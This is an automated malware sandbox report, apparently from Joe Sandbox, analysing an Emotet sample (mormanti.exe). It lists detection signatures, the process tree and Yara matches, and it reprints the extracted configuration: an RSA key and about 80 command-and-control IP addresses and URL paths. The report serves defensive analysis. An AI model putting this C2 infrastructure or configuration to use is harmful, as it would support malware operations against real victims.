Loading ...

Play interactive tourEdit tour

Windows Analysis Report mormanti.exe

Overview

General Information

Sample Name:mormanti.exe
Analysis ID:449959
MD5:6c94edfea6e5ee001b00122c9d01bd8a
SHA1:a8d0cc5088ee86c2be77afe157695d12e951f369
SHA256:0154d1d06e755bda091168038f25c1dde101e3b77c66f88b73c71be84ffdaf6e
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • mormanti.exe (PID: 3412 cmdline: 'C:\Users\user\Desktop\mormanti.exe' MD5: 6C94EDFEA6E5EE001B00122C9D01BD8A)
    • eventvwr.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe MD5: 6C94EDFEA6E5EE001B00122C9D01BD8A)
  • svchost.exe (PID: 3148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 384 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2168 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4744 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4880 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1276 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4936 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5588 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3468 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2648 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4820 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["58.171.153.81:80", "104.131.103.128:443", "66.228.49.173:8080", "104.131.103.37:8080", "149.62.173.247:8080", "72.47.248.48:7080", "68.183.170.114:8080", "81.198.69.61:80", "217.13.106.14:8080", "77.90.136.129:8080", "217.199.160.224:7080", "178.79.163.131:8080", "2.47.112.152:80", "83.169.21.32:7080", "190.163.31.26:80", "185.94.252.27:443", "12.162.84.2:8080", "73.116.193.136:80", "177.72.13.80:80", "116.125.120.88:443", "213.181.91.224:80", "104.131.41.185:8080", "46.28.111.142:7080", "181.129.96.162:8080", "189.2.177.210:443", "111.67.12.221:8080", "189.194.58.119:80", "51.255.165.160:8080", "170.81.48.2:80", "177.74.228.34:80", "70.32.84.74:8080", "213.60.96.117:80", "186.250.52.226:8080", "70.32.115.157:8080", "190.190.148.27:8080", "204.225.249.100:7080", "192.241.143.52:8080", "202.62.39.111:80", "82.76.111.249:443", "190.147.137.153:443", "80.249.176.206:80", "91.219.169.180:80", "212.71.237.140:8080", "114.109.179.60:80", "5.196.35.138:7080", "87.106.46.107:8080", "190.6.193.152:8080", "172.104.169.32:8080", "186.103.141.250:443", "212.231.60.98:80", "147.91.184.91:80", "50.28.51.143:8080", "61.92.159.208:8080", "187.162.248.237:80", "191.182.6.118:80", "94.206.45.18:80", "219.92.13.25:80", "145.236.8.174:80", "89.32.150.160:8080", "93.151.186.85:80", "190.17.195.202:80", "181.120.79.227:80", "177.73.0.98:443", "192.241.146.84:8080", "217.160.182.191:8080", "68.183.190.199:8080", "137.74.106.111:7080", "177.144.135.2:80", "201.213.156.176:80", "82.196.15.205:8080", "104.236.161.64:8080", "209.236.123.42:8080", "77.55.211.77:8080", "177.66.190.130:80", "143.0.87.101:80", "94.176.234.118:443", "191.99.160.58:80", "185.94.252.12:80", "45.161.242.102:80", "181.36.42.205:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.465228013.0000000001140000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000002.00000002.465253689.0000000001151000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.mormanti.exe.2db053f.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            2.2.eventvwr.exe.114053f.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              0.2.mormanti.exe.2db053f.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                2.2.eventvwr.exe.114053f.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: mormanti.exeAvira: detected
                  Found malware configurationShow sources
                  Source: 0.2.mormanti.exe.2db053f.1.raw.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["58.171.153.81:80", "104.131.103.128:443", "66.228.49.173:8080", "104.131.103.37:8080", "149.62.173.247:8080", "72.47.248.48:7080", "68.183.170.114:8080", "81.198.69.61:80", "217.13.106.14:8080", "77.90.136.129:8080", "217.199.160.224:7080", "178.79.163.131:8080", "2.47.112.152:80", "83.169.21.32:7080", "190.163.31.26:80", "185.94.252.27:443", "12.162.84.2:8080", "73.116.193.136:80", "177.72.13.80:80", "116.125.120.88:443", "213.181.91.224:80", "104.131.41.185:8080", "46.28.111.142:7080", "181.129.96.162:8080", "189.2.177.210:443", "111.67.12.221:8080", "189.194.58.119:80", "51.255.165.160:8080", "170.81.48.2:80", "177.74.228.34:80", "70.32.84.74:8080", "213.60.96.117:80", "186.250.52.226:8080", "70.32.115.157:8080", "190.190.148.27:8080", "204.225.249.100:7080", "192.241.143.52:8080", "202.62.39.111:80", "82.76.111.249:443", "190.147.137.153:443", "80.249.176.206:80", "91.219.169.180:80", "212.71.237.140:8080", "114.109.179.60:80", "5.196.35.138:7080", "87.106.46.107:8080", "190.6.193.152:8080", "172.104.169.32:8080", "186.103.141.250:443", "212.231.60.98:80", "147.91.184.91:80", "50.28.51.143:8080", "61.92.159.208:8080", "187.162.248.237:80", "191.182.6.118:80", "94.206.45.18:80", "219.92.13.25:80", "145.236.8.174:80", "89.32.150.160:8080", "93.151.186.85:80", "190.17.195.202:80", "181.120.79.227:80", "177.73.0.98:443", "192.241.146.84:8080", "217.160.182.191:8080", "68.183.190.199:8080", "137.74.106.111:7080", "177.144.135.2:80", "201.213.156.176:80", "82.196.15.205:8080", "104.236.161.64:8080", "209.236.123.42:8080", "77.55.211.77:8080", "177.66.190.130:80", "143.0.87.101:80", "94.176.234.118:443", "191.99.160.58:80", "185.94.252.12:80", "45.161.242.102:80", "181.36.42.205:443"]}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: mormanti.exeVirustotal: Detection: 74%Perma Link
                  Source: mormanti.exeReversingLabs: Detection: 82%
                  Source: mormanti.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\mormanti.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dllJump to behavior
                  Source: mormanti.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb` source: mormanti.exe, 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp, eventvwr.exe, 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb`@ source: mormanti.exe
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb source: mormanti.exe
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC2871 FindFirstFileW,FindNextFileW,FindClose,0_2_02DC2871

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.131.103.37: -> 192.168.2.3:
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorIPs: 58.171.153.81:80
                  Source: Malware configuration extractorIPs: 104.131.103.128:443
                  Source: Malware configuration extractorIPs: 66.228.49.173:8080
                  Source: Malware configuration extractorIPs: 104.131.103.37:8080
                  Source: Malware configuration extractorIPs: 149.62.173.247:8080
                  Source: Malware configuration extractorIPs: 72.47.248.48:7080
                  Source: Malware configuration extractorIPs: 68.183.170.114:8080
                  Source: Malware configuration extractorIPs: 81.198.69.61:80
                  Source: Malware configuration extractorIPs: 217.13.106.14:8080
                  Source: Malware configuration extractorIPs: 77.90.136.129:8080
                  Source: Malware configuration extractorIPs: 217.199.160.224:7080
                  Source: Malware configuration extractorIPs: 178.79.163.131:8080
                  Source: Malware configuration extractorIPs: 2.47.112.152:80
                  Source: Malware configuration extractorIPs: 83.169.21.32:7080
                  Source: Malware configuration extractorIPs: 190.163.31.26:80
                  Source: Malware configuration extractorIPs: 185.94.252.27:443
                  Source: Malware configuration extractorIPs: 12.162.84.2:8080
                  Source: Malware configuration extractorIPs: 73.116.193.136:80
                  Source: Malware configuration extractorIPs: 177.72.13.80:80
                  Source: Malware configuration extractorIPs: 116.125.120.88:443
                  Source: Malware configuration extractorIPs: 213.181.91.224:80
                  Source: Malware configuration extractorIPs: 104.131.41.185:8080
                  Source: Malware configuration extractorIPs: 46.28.111.142:7080
                  Source: Malware configuration extractorIPs: 181.129.96.162:8080
                  Source: Malware configuration extractorIPs: 189.2.177.210:443
                  Source: Malware configuration extractorIPs: 111.67.12.221:8080
                  Source: Malware configuration extractorIPs: 189.194.58.119:80
                  Source: Malware configuration extractorIPs: 51.255.165.160:8080
                  Source: Malware configuration extractorIPs: 170.81.48.2:80
                  Source: Malware configuration extractorIPs: 177.74.228.34:80
                  Source: Malware configuration extractorIPs: 70.32.84.74:8080
                  Source: Malware configuration extractorIPs: 213.60.96.117:80
                  Source: Malware configuration extractorIPs: 186.250.52.226:8080
                  Source: Malware configuration extractorIPs: 70.32.115.157:8080
                  Source: Malware configuration extractorIPs: 190.190.148.27:8080
                  Source: Malware configuration extractorIPs: 204.225.249.100:7080
                  Source: Malware configuration extractorIPs: 192.241.143.52:8080
                  Source: Malware configuration extractorIPs: 202.62.39.111:80
                  Source: Malware configuration extractorIPs: 82.76.111.249:443
                  Source: Malware configuration extractorIPs: 190.147.137.153:443
                  Source: Malware configuration extractorIPs: 80.249.176.206:80
                  Source: Malware configuration extractorIPs: 91.219.169.180:80
                  Source: Malware configuration extractorIPs: 212.71.237.140:8080
                  Source: Malware configuration extractorIPs: 114.109.179.60:80
                  Source: Malware configuration extractorIPs: 5.196.35.138:7080
                  Source: Malware configuration extractorIPs: 87.106.46.107:8080
                  Source: Malware configuration extractorIPs: 190.6.193.152:8080
                  Source: Malware configuration extractorIPs: 172.104.169.32:8080
                  Source: Malware configuration extractorIPs: 186.103.141.250:443
                  Source: Malware configuration extractorIPs: 212.231.60.98:80
                  Source: Malware configuration extractorIPs: 147.91.184.91:80
                  Source: Malware configuration extractorIPs: 50.28.51.143:8080
                  Source: Malware configuration extractorIPs: 61.92.159.208:8080
                  Source: Malware configuration extractorIPs: 187.162.248.237:80
                  Source: Malware configuration extractorIPs: 191.182.6.118:80
                  Source: Malware configuration extractorIPs: 94.206.45.18:80
                  Source: Malware configuration extractorIPs: 219.92.13.25:80
                  Source: Malware configuration extractorIPs: 145.236.8.174:80
                  Source: Malware configuration extractorIPs: 89.32.150.160:8080
                  Source: Malware configuration extractorIPs: 93.151.186.85:80
                  Source: Malware configuration extractorIPs: 190.17.195.202:80
                  Source: Malware configuration extractorIPs: 181.120.79.227:80
                  Source: Malware configuration extractorIPs: 177.73.0.98:443
                  Source: Malware configuration extractorIPs: 192.241.146.84:8080
                  Source: Malware configuration extractorIPs: 217.160.182.191:8080
                  Source: Malware configuration extractorIPs: 68.183.190.199:8080
                  Source: Malware configuration extractorIPs: 137.74.106.111:7080
                  Source: Malware configuration extractorIPs: 177.144.135.2:80
                  Source: Malware configuration extractorIPs: 201.213.156.176:80
                  Source: Malware configuration extractorIPs: 82.196.15.205:8080
                  Source: Malware configuration extractorIPs: 104.236.161.64:8080
                  Source: Malware configuration extractorIPs: 209.236.123.42:8080
                  Source: Malware configuration extractorIPs: 77.55.211.77:8080
                  Source: Malware configuration extractorIPs: 177.66.190.130:80
                  Source: Malware configuration extractorIPs: 143.0.87.101:80
                  Source: Malware configuration extractorIPs: 94.176.234.118:443
                  Source: Malware configuration extractorIPs: 191.99.160.58:80
                  Source: Malware configuration extractorIPs: 185.94.252.12:80
                  Source: Malware configuration extractorIPs: 45.161.242.102:80
                  Source: Malware configuration extractorIPs: 181.36.42.205:443
                  Source: unknownNetwork traffic detected: IP country count 34
                  Source: global trafficTCP traffic: 192.168.2.3:49728 -> 66.228.49.173:8080
                  Source: global trafficTCP traffic: 192.168.2.3:49734 -> 104.131.103.37:8080
                  Source: global trafficTCP traffic: 192.168.2.3:49740 -> 149.62.173.247:8080
                  Source: global trafficTCP traffic: 192.168.2.3:49741 -> 72.47.248.48:7080
                  Source: global trafficTCP traffic: 192.168.2.3:49744 -> 68.183.170.114:8080
                  Source: Joe Sandbox ViewIP Address: 149.62.173.247 149.62.173.247
                  Source: Joe Sandbox ViewIP Address: 204.225.249.100 204.225.249.100
                  Source: Joe Sandbox ViewASN Name: INFORTELECOM-ASES INFORTELECOM-ASES
                  Source: Joe Sandbox ViewASN Name: CLAROSABR CLAROSABR
                  Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 58.171.153.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 58.171.153.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 58.171.153.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.128
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.128
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.128
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.228.49.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.228.49.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.228.49.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.131.103.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 149.62.173.247
                  Source: unknownTCP traffic detected without corresponding DNS query: 149.62.173.247
                  Source: unknownTCP traffic detected without corresponding DNS query: 149.62.173.247
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.47.248.48
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.47.248.48
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.47.248.48
                  Source: unknownTCP traffic detected without corresponding DNS query: 68.183.170.114
                  Source: unknownTCP traffic detected without corresponding DNS query: 68.183.170.114
                  Source: unknownTCP traffic detected without corresponding DNS query: 68.183.170.114
                  Source: eventvwr.exe, 00000002.00000003.394916417.00000000034DC000.00000004.00000001.sdmpString found in binary or memory: http://104.131.103.128:443/iNVKl1XPWZqml34fy2r/3FDoguFdfDtjz/
                  Source: eventvwr.exe, 00000002.00000003.394916417.00000000034DC000.00000004.00000001.sdmpString found in binary or memory: http://149.62.173.247/kH8ALNiaGV/5bEuMKuJNKlslD3n/rvXy2RpDwZlslOQBeY7/BCLTdgbwF6J8vsIGfDq/jZ9iV8xFle
                  Source: eventvwr.exe, 00000002.00000003.394916417.00000000034DC000.00000004.00000001.sdmpString found in binary or memory: http://149.62.173.247:8080/kH8ALNiaGV/5bEuMKuJNKlslD3n/rvXy2RpDwZlslOQBeY7/BCLTdgbwF6J8vsIGfDq/jZ9iV
                  Source: eventvwr.exe, 00000002.00000003.334412522.00000000034DC000.00000004.00000001.sdmpString found in binary or memory: http://58.171.153.81/j4XmHhlvX7h4pe/uu11HumRcyQn/3XzJ/ymPM07W/vKmfGodTznrrD/
                  Source: eventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://66.228.49.173/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/
                  Source: eventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://66.228.49.173:8080/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/
                  Source: eventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://66.228.49.173:8080/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/s(KF
                  Source: eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://68.183.170.114/nFzrf7w0/EO2pZ/MQ0xve/
                  Source: eventvwr.exe, 00000002.00000002.466095172.0000000002ED6000.00000004.00000001.sdmp, eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/
                  Source: eventvwr.exe, 00000002.00000002.466095172.0000000002ED6000.00000004.00000001.sdmpString found in binary or memory: http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/:
                  Source: eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/c
                  Source: eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/
                  Source: eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/6O
                  Source: eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpString found in binary or memory: http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/CL:
                  Source: svchost.exe, 00000006.00000002.466542718.0000022B0E414000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: svchost.exe, 00000006.00000002.466542718.0000022B0E414000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: svchost.exe, 00000006.00000002.466542718.0000022B0E414000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                  Source: svchost.exe, 00000006.00000002.465692005.0000022B08EA3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/
                  Source: svchost.exe, 00000006.00000002.466806888.0000022B0E690000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: svchost.exe, 0000000E.00000002.309089370.00000265B8A13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                  Source: svchost.exe, 0000000B.00000002.465372736.000001C4AD22A000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                  Source: svchost.exe, 0000000B.00000002.465372736.000001C4AD22A000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                  Source: svchost.exe, 0000000B.00000002.465372736.000001C4AD22A000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                  Source: svchost.exe, 0000000B.00000002.465372736.000001C4AD22A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 0000000B.00000002.465372736.000001C4AD22A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                  Source: svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                  Source: svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000E.00000003.308695347.00000265B8A45000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                  Source: svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                  Source: svchost.exe, 0000000E.00000002.309153516.00000265B8A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                  Source: svchost.exe, 0000000E.00000002.309153516.00000265B8A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000E.00000002.309177417.00000265B8A58000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                  Source: svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000E.00000002.309177417.00000265B8A58000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000E.00000002.309177417.00000265B8A58000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000E.00000003.308695347.00000265B8A45000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.309153516.00000265B8A42000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                  Source: svchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                  Source: svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000E.00000003.286870020.00000265B8A31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: eventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://fs.microsoft.c
                  Source: svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.309089370.00000265B8A13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000E.00000003.286870020.00000265B8A31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000E.00000003.308695347.00000265B8A45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000E.00000003.286870020.00000265B8A31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                  Source: svchost.exe, 0000000E.00000003.308721293.00000265B8A3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: svchost.exe, 0000000E.00000003.308695347.00000265B8A45000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

                  E-Banking Fraud:

                  barindex
                  Yara detected EmotetShow sources
                  Source: Yara matchFile source: 0.2.mormanti.exe.2db053f.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.eventvwr.exe.114053f.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mormanti.exe.2db053f.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.eventvwr.exe.114053f.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.465228013.0000000001140000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, type: MEMORY
